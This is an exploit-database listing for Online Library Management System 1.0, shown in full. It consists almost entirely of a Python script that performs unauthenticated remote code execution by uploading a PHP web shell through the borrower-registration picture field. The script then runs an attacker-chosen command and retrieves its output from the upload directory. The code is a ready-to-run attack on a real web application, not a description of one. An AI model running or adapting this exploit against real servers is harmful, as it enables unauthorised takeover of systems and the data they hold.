Exploit for Online Library Management System 1.0 Shell Upload

Name: Exploit for Online Library Management System 1.0 Shell Upload
Rating: 5 (174 reviews)
2021-06-23 | CVSS -0.3
## https://sploitus.com/exploit?id=PACKETSTORM:163252
# Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)  
# Date: 23-06-2021  
# Exploit Author: Berk Can Geyikci  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ols.zip  
# Version: 1.0  
# Tested on: Windows 10 Pro 64 Bit 10.0.19041 + XAMPP V7.3.28  
# Exploit Tested Using: Python 3.8.6  
  
'''  
Steps To Produce:  
1)Click Books  
2)Select one book and click Read more  
3)Get the book id from url #example_url http://localhost/ols/index.php?q=bookdetails&id=15243678  
4)Execute Python Script with URL, Book id and Command  
'''  
  
  
'''  
Import required modules:  
'''  
import sys, hashlib, requests  
import urllib  
import time  
import random  
  
try:  
#settings  
target_url = sys.argv[1]  
book_id = sys.argv[2]  
command = sys.argv[3]  
  
except IndexError:  
  
print("- usage: %s <target> <book_id> <command>" % sys.argv[0])  
print("- Example: %s http://example.com 15243678 'whoami'" % sys.argv[0])  
sys.exit()  
  
url = target_url+"/ols/proccess.php?action=add"  
  
session = requests.Session()  
session.get(target_url+"/ols")  
session_cookies = session.cookies  
php_cookie = session.cookies.get_dict()['PHPSESSID'].strip()  
print("Getting Session Cookie= "+php_cookie)  
  
random_borrower_id = random.randint(0,999999)  
  
#Headers to upload php  
headers = {  
"Accept-Encoding": "gzip, deflate",  
"Referer": target_url + "/ols/index.php?q=borrow&id="+ book_id +"/",  
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryBA3sFU893qYE7jKq",  
"Upgrade-Insecure-Requests": "1",  
"Connection": "close",  
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",  
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",  
"Cookie": "PHPSESSID="+php_cookie  
}  
  
req = requests.get(target_url+"/ols/index.php?q=borrow&id="+book_id, headers=headers)  
  
  
data = "------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n15243678\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"BorrowerId\"\r\n\r\n"+str(random_borrower_id)+"\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"deptid\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"Firstname\"\r\n\r\ndummy_firstname\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"deptid\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"Lastname\"\r\n\r\ndummy_lastname\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"deptid\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"MiddleName\"\r\n\r\ndummy_middlename\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"Address\"\r\n\r\ndummy_address\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"optionsRadios\"\r\n\r\nMale\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"ContactNo\"\r\n\r\n1\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"CourseYear\"\r\n\r\n2021\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"BUsername\"\r\n\r\ndummy_username\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"BPassword\"\r\n\r\ndummy_\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"picture\"; filename=\"rcepoc_"+str(random_borrower_id)+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\r\n\r\n\r\n\r\necho shell_exec('"+command+"');\r\n\r\n\r\n\r\n?>\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"save\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq--\r\n"  
  
req = requests.post(url, headers=headers, data=data)  
print("Uploading file...")  
  
req = requests.get(target_url+"/ols/proccess.php?action=checkout&id="+book_id, headers=headers)  
#print(req.text)  
  
req = requests.get(target_url+"/ols/borrower/", headers=headers)  
#print(req.text)  
  
req = requests.get(target_url+"/ols/asset/images/borrower/", headers=headers)  
reqq = req.text  
#print(reqq)  
reqqq = reqq.find(str(random_borrower_id))  
command_result = reqq[reqqq-21:reqqq+10]  
  
req = requests.get(target_url+"/ols/asset/images/borrower/"+command_result+"", headers=headers)  
print("Command Result = "+req.text)